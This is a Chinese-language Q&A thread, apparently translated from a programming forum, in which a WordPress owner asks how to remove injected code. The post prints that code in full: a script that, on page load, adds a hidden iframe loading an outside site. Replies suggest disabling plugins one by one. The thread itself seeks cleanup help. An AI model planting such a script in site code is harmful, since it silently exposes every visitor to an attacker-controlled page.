【发布时间】:2015-09-28 05:23:07
【问题描述】:
我浏览了我的网站并注意到以前没有的滚动。
检查后我发现有一个不可见的 iFrame。
在源页面中看到 iframe 后,我查看了所有站点文件,但找不到与源页面中相同的代码行。
我运行我的网站以查找恶意软件,但一切正常。几个月前我确实收到了谷歌的警告,但我的主机删除了恶意文件,谷歌批准了清理工作,现在仍然如此。但现在我看到了这个带有 url 的不可见对象。
源脚本:
<script language="JavaScript">
if(document.loaded) {
showBrowVer();
} else {
if (window.addEventListener) {
window.addEventListener('load', showBrowVer, false);
} else {
window.attachEvent('onload', showBrowVer);
}
}
function showBrowVer() {
var divTag=document.createElement('div');
divTag.id='dt';
document.body.appendChild(divTag);
var js_kod2 = document.createElement('iframe');
js_kod2.src = 'http://24corp-shop.com';
js_kod2.width = '250px';
js_kod2.height = '320px';
js_kod2.setAttribute('style','visibility:hidden');
document.getElementById('dt').appendChild(js_kod2);
}
</script>
我看到它是由wp_head(); 带来的,但我查看了它并没有发现任何可疑之处。
有没有人有关于寻找这种注入以手动将其从我的 WP 站点中删除的提示?
【问题讨论】:
-
禁用所有插件,看看它是否是其中之一。如果是,则一次激活每个插件,直到它再次出现。
-
您是在浏览器中看到此代码还是包含在您的 Web 服务器的源代码中?
-
在浏览器中看到了。我一一停用了所有插件,它仍然存在。
-
你找到正确答案了吗??
标签: javascript wordpress iframe code-injection malware